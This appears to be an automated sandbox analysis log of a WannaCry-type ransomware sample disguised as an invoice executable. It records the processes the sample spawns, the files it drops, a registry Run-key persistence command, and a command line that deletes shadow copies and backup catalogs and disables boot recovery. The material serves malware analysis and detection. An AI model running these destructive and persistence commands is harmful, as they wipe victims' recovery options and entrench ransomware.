            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe co
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Process created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h .Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /QJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 118491705402797.bat
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe co
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
            Source: C:\Program Files\7-Zip\7zG.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | Window found: window name: RICHEDIT
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | File opened: C:\Windows\SysWOW64\RICHED32.DLL
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: Request for Quotation (RFQ_196).zip.zip | Static file information: File size 3482858 > 1048576
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | Code function: 10_2_100011D0 wcsrchr,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GlobalAlloc,GetTokenInformation,LoadLibraryA,GetProcAddress,wcscpy,GlobalFree,10_2_100011D0
            Source: libeay32.dll.59.dr | Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
            Source: libevent-2-0-5.dll.59.dr | Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
            Source: libevent_core-2-0-5.dll.59.dr | Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
            Source: libevent_extra-2-0-5.dll.59.dr | Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
            Source: libgcc_s_sjlj-1.dll.59.dr | Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
            Source: libssp-0.dll.59.dr | Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
            Source: ssleay32.dll.59.dr | Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | Code function: 10_2_10006BD0 push eax; ret 10_2_10006BFE
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe | Code function: 86_2_6CDABCC8 push edx; mov dword ptr [esp], ebx 86_2_6CDABDFB
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe | Code function: 86_2_6CDABCC8 push edx; mov dword ptr [esp], ebx 86_2_6CDABECB
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe | Code function: 86_2_6CDABCC8 push edx; mov dword ptr [esp], ebx 86_2_6CDABF9B

            Persistence and Installation Behavior

            Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Desktop\m.vbs
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\Documents\@WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | Process created: attrib.exe
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | Process created: reg.exe
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | File created: C:\Users\user\Desktop\TaskData\Tor\libeay32.dll
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\Desktop\@WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | File created: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | File created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\Desktop\taskdl.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\Desktop\taskse.exe
            Source: C:\Program Files\7-Zip\7zG.exe | File created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | File created: C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | File created: C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | File created: C:\Users\user\Desktop\TaskData\Tor\zlib1.dll
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | File created: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | File created: C:\Users\user\Desktop\TaskData\Tor\tor.exe
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\Downloads\@WanaDecryptor@.exe
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | File created: C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe | File created: C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\Desktop\u.wnry
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\~SD1F4B.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\~SD1F4C.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\~SD1F4D.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\~SD1F4E.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\~SD1F4F.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\~SD1F50.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\~SD1F51.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\~SD1F62.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca\~SD1F63.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs\~SD1F64.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da\~SD1F65.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de\~SD1F85.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el\~SD1F86.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en\~SD1F87.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\~SD1F98.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es\~SD945B.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419\~SD945C.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et\~SD945D.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi\~SD945E.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil\~SD945F.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr\~SD9460.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi\~SD9461.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr\~SD9462.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu\~SD9463.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id\~SD9464.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it\~SD9465.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja\~SD9466.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\~SD9467.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt\~SD9468.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv\~SD9469.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb\~SD946A.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\~SD946B.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\~SD946C.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR\~SD947D.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\~SD947E.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\~SD947F.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru\~SD9480.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\~SD9481.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\~SD9482.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr\~SD9483.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\~SD9484.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\~SD9485.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr\~SD9486.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\~SD9487.tmpJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ubykpkpwzybxbgo789

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\~SD4959.tmpJump to behavior
            Source: @WanaDecryptor@.exe, 0000003B.00000003.2426018255.0000000002817000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drBinary or memory string: onion-port
            Source: c:\users\user\desktop\request for quotation (rfq_196).zip.zipFile moved: C:\Users\user\AppData\Local\Temp\20.WNCRYTJump to behavior
